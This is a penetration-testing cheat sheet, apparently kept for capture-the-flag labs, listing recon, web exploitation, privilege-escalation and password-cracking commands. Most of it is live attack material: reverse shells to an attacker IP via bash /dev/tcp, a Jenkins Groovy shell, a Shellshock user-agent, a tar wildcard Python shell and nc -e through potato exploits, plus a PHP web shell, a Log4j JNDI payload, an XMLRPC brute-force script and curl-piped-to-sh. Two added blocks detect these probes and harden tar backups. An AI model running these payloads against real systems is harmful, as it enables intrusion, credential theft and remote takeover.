Recon
NMAP
# to get all ports
nmap -p- -T4 10.10.135.68 -v
sudo nmap -sS -p- -T4 10.10.240.251 -v
# scan deeper the open ports
nmap -p22,80 -sS -sC -sV 10.10.135.68 -v
ls /usr/share/nmap/scripts/ | grep smb
Dirb
dirb http://10.10.135.68/
Gobuster
gobuster -w /usr/share/wordlists/dirb/big.txt dir -u http://seasurfer.thm/
Nikto
nikto -h 10.10.135.68
Wfuzz
subdomains
wfuzz -c -f sub-fighter -w subd.txt -u 'http://cmess.thm' -H "Host: FUZZ.cmess.thm" --hw 290
wfuzz -c -f sub-fighter -w subdomains.lst -u 'http://nahamstore.thm' -H "Host: FUZZ.nahamstore.thm" --hw 65
In Web Browser
- network
- cookies
- what requests are sent (using some proxy)
PHP Website
- if syntax highlighting is enabled then check .phps
SMB, RDP
smbclient -L 10.10.150.121 -N
smbmap -H 10.10.240.251
smbmap -u 'lilyle' -p 'ChangeMe#1234' -H windcorp.thm # shares
smbmap -u 'lilyle' -p 'ChangeMe#1234' -H windcorp.thm -r # things inside shares
enum4linux -a 10.10.240.251
# brute force
crackmapexec smb 10.10.83.74 -u Jareth -p /usr/share/wordlists/rockyou.txt
# get access
evil-winrm -i 10.10.83.74 -u Jareth -p sarah
SNMP
# Community String Brute Force
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/SNMP/snmp-onesixtyone.txt
onesixtyone 10.10.83.74 -c snmp-onesixtyone.txt
# enum snmp
snmp-check -c openview 10.10.83.74
snmpwalk
CMS
Joomla
http://10.10.114.248/joomla//administrator/manifests/files/joomla.xml
says that the version is 3.9.12.
/README.txt is another place to check.
You can find an exploit at https://www.exploit-db.com/exploits/42033. There is a SQLi in the following URL: http://10.10.107.150/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml<SQLI>
Another exploit that can be found: https://github.com/stefanlucas/Exploit-Joomla
RCE is possible
sar2html
/_test has sar2html, which is vulnerable to RCE: /index.php?plot=;<command>, then click "select host".
https://www.exploit-db.com/exploits/47204
Wordpress
https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/wordpress
Users: http://internal.thm/blog/index.php/wp-json/wp/v2/users/
/index.php/comments/feed/ is worth checking
XMLRPC
curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>pass</value></param></params></methodCall>" http://internal.thm/blog/xmlrpc.php
Brute force XMLRPC
#!/bin/bash
# try each password from the wordlist for the admin user via wp.getUsersBlogs
while IFS= read -r pass; do
  echo "$pass"
  curl -X POST -d "<methodCall><methodName>wp.getUsersBlogs</methodName><params>
<param><value>admin</value></param><param><value>$pass</value></param></params></methodCall>" http://internal.thm/blog/xmlrpc.php
done < "/usr/share/wordlists/rockyou.txt"
Jenkins
/script (the Groovy script console)
for RCE
Thread.start {
String host="10.8.97.245";
int port=1234;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();
}
Exploitation
RCE and Reverse shell payloads
php
<?php system($_GET['cmd']);?>
- https://github.com/pentestmonkey/php-reverse-shell
- https://github.com/ivan-sincek/php-reverse-shell/blob/master/src/reverse/php_reverse_shell.php - PHP Reverse Shell
- https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php - PHP Reverse Shell
bash
/bin/bash -c 'bash -i >& /dev/tcp/10.8.97.245/4444 0>&1'
msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.97.245 LPORT=1234 -f aspx >reverse.aspx
Command Injection
https://book.hacktricks.xyz/pentesting-web/command-injection
/ping?ip=10.8.97.245 %0A ls
LFI
http://10.10.97.188/?view=php://filter/read=convert.base64-encode/resource=dog/../flag
- returns the file base64-encoded. Useful when you cannot get the PHP source otherwise.
SQLi
sqlmap
sqlmap -r aaa.req --dump-all --batch
Shellshock
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id" http://10.10.135.68/cgi-bin/test.cgi
curl -A "() { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /bin/bash -c 'exec /bin/bash -i >& /dev/tcp/10.8.97.245/1234 0>&1'" http://10.10.135.68/cgi-bin/test.cgi
Log4J
- https://hackernoon.com/pentests-and-log4j-how-to-exploit-a-vulnerable-system
- https://github.com/kozmer/log4j-shell-poc
To run the exploit:
- In one terminal:
nc -lvnp 9001
- in another:
git clone https://github.com/kozmer/log4j-shell-poc
cd log4j-shell-poc
vim poc.py
# change /bin/sh to cmd if the target machine is Windows
python3 poc.py --userip 10.10.14.92 --webport 8000 --lport 9001
# then paste ${jndi:ldap://10.10.14.92:1389/a} in input place
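Defender-side counterpart to the Shellshock and Log4j probes above, as an added example that is not part of these notes: it flags both request patterns in combined-format access logs. The log lines are constructed sample data, not real traffic.

```bash
#!/bin/sh
# Added example, not from the original notes: spot Shellshock and Log4Shell
# probes in combined-format web access logs. The log lines below are
# constructed sample data, not real traffic.

SAMPLE_LOG='10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { ignored; }; echo Content-Type: text/plain ; echo ; /usr/bin/id"
10.0.0.6 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "POST /login HTTP/1.1" 302 0 "-" "${jndi:ldap://10.10.14.92:1389/a}"
10.0.0.8 - - [01/Jan/2024:10:00:03 +0000] "GET /search?q=${JNDI:rmi://x/a} HTTP/1.1" 404 0 "-" "curl/8.0"'

# Read log lines on stdin; print "<client-ip> <indicator> <request-line>" for
# each line carrying a bash function definition "() {" (Shellshock, usually in
# the User-Agent) or a "${jndi:" lookup (Log4Shell, in the URL or any header).
# Matching is case-insensitive so "${JNDI:" is caught as well.
flag_probes() {
  awk '
    {
      line = tolower($0)
      split($0, q, "\"")            # q[2] is the request line in combined format
      if (line ~ /\(\) *[{]/)       print $1, "shellshock", q[2]
      else if (line ~ /\$[{]jndi:/) print $1, "log4shell",  q[2]
    }'
}

# Run the detector over the constructed sample.
scan_sample() {
  printf '%s\n' "$SAMPLE_LOG" | flag_probes
}
```

Feed a real log with `flag_probes < /var/log/apache2/access.log` to get one line per hit.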
Post Exploitation
Linux
NFS Share
# find available folders
showmount -e 10.10.240.128
# mount
mkdir /mnt/new_back
mount -t nfs 10.10.240.128:/home/nfs /mnt/new_back -o nolock
Linux PrivEsc Checks
sudo -l
# suid
find / -perm -4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
# crontab
cat /etc/crontab
# capabilities
getcap -r / 2>/dev/null
# files owned by
find / -user hakanbey 2>/dev/null
find /usr/bin -group hakanbey 2>/dev/null | more
# check network connections
ss -tulpn
# check processes
ps aux | grep root
# check some folders
ls /opt
Linpeas
https://github.com/peass-ng/PEASS-ng/blob/master/linPEAS/README.md
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Docker
r00t@ultratech-prod:~$ groups
r00t docker
https://gtfobins.github.io/gtfobins/docker/
docker run -v /:/mnt --rm -it bash chroot /mnt sh
# whoami
root
If there is no bash image, run docker images and choose one.
Tar and Wildcard
If a backup.sh that runs periodically passes a bare * to tar, tar checkpoints can be abused:
https://www.gnu.org/software/tar/manual/html_section/checkpoints.html
# for example, the script contains this command
tar -zcf /home/kyle/backups/invoices.tgz *
then create a shell script and the two checkpoint option files
echo $'/usr/bin/python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.8.35.156\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/sh\")\'' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
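Added example, not from these notes: how to audit a backup directory for planted option-shaped file names, and how to write the tar line so that wildcard expansion cannot turn file names into options. It assumes GNU tar and a writable temp directory; the directory contents are constructed sample data.

```bash
#!/bin/sh
# Added example, not from the original notes: the wildcard in
# "tar -zcf backup.tgz *" lets anyone who can create files in that directory
# smuggle tar options in as file names. This shows how to spot such planted
# names and how to write the backup so they stay plain file names.
# Assumes GNU tar and a writable temp directory.

# Construct a directory that mimics the backup target, including the two
# option-shaped file names from the technique above (sample data).
make_sample_dir() {
  d="$(mktemp -d)"
  echo "invoice" > "$d/inv-001.txt"
  : > "$d/--checkpoint=1"
  : > "$d/--checkpoint-action=exec=touch pwned"
  printf '%s' "$d"
}

# Detection: a file name beginning with '-' has no business in a backup
# directory; list any such names (what a cron audit should alert on).
find_option_named_files() {
  for f in "$1"/-*; do
    [ -e "$f" ] && printf '%s\n' "${f##*/}"
  done
  return 0
}

# Hardened backup: "./*" expands to names like "./--checkpoint=1", which tar
# can only read as paths, and "--" ends option parsing as a second guard.
# The unsafe form "tar -zcf out.tgz *" would run "touch pwned" during this step.
safe_backup() {
  ( cd "$1" && tar -zcf "$2" -- ./* )
}

# Verification helper: prints 1 if the checkpoint payload ran, 0 otherwise.
payload_ran() {
  [ -e "$1/pwned" ] && echo 1 || echo 0
}
```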
Windows
Better Runas - RunasCs
# for reverse shell
C:\> RunasCs.exe <user> <pass> cmd.exe -r 10.10.14.92:1234
SYSTEM and SAM creds dump
impacket-secretsdump -ts local -system system.bak -sam sam.bak
Potato Attack
https://github.com/ohpe/juicy-potato/releases
JuicyPotato.exe -l 1337 -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p c:\windows\system32\cmd.exe -a "/c c:\users\public\nc.exe -e cmd.exe 10.8.97.245 4444" -t *
https://github.com/itm4n/PrintSpoofer
PrintSpoofer64.exe -c "c:\inetpub\wwwroot\nt4wrksv\nc.exe -e cmd.exe 10.8.97.245 4444"
HHUPD.EXE
https://sotharo-meas.medium.com/cve-2019-1388-windows-privilege-escalation-through-uac-22693fa23f5f
Brute Force and Password Cracking
john
john hash --wordlist=/usr/share/wordlists/rockyou.txt
FFUF
ffuf -u http://10.10.142.177/api/login -X POST -w userlist.txt:W1,md5_passwords.txt:W2 -H "Content-Type: application/json" -d '{"username":"W1","password":"W2"}' -v -o result
Hydra
hydra -P /usr/share/wordlists/rockyou.txt -l admin blitz.icsd http-get-form "/:j_username=^USER^&j_password=^PASS^&from=&Submit=:Invalid username or password"
Sucrack
https://github.com/hemp3l/sucrack
cd sucrack
./configure
make
src/sucrack -u hakanbey -w 100 wordlist.txt
Others
Shell Stabilization
Unix
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
# ctrl+z
stty raw -echo; fg
Windows
msfconsole
# then
use exploit/windows/misc/hta_server
set lhost <ip>
run
# then in windows
mshta http://10.10.14.92:8080/2ao4a48kDfJgdCl.hta
SSH Port Forwarding
The service on the remote host listens on 172.17.0.2:8080; forward it to local port 8080 so you can work on it locally:
ssh -L 8080:172.17.0.2:8080 [email protected] -N
Socat Port Forwarding
The service listens on 127.0.0.1:22; forward it so it is reachable on port 2222:
socat TCP-LISTEN:2222,fork TCP:127.0.0.1:22
RDP Connect
xfreerdp /u:Wade /v:10.10.15.65 /p:parzival /dynamic-resolution
Decode Encode
Steganography
Steghide
steghide extract -sf somefile.png
Reverse engineering
strings somebinary
ltrace somebinary
Buffer Overflow
- An example here [[Anonymous Playground]]
objdump -d -Mintel hacktheworld
echo -n aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa > input
echo -n 580640000000 | xxd -r -p >> input
gdb hacktheworld
(gdb) run < input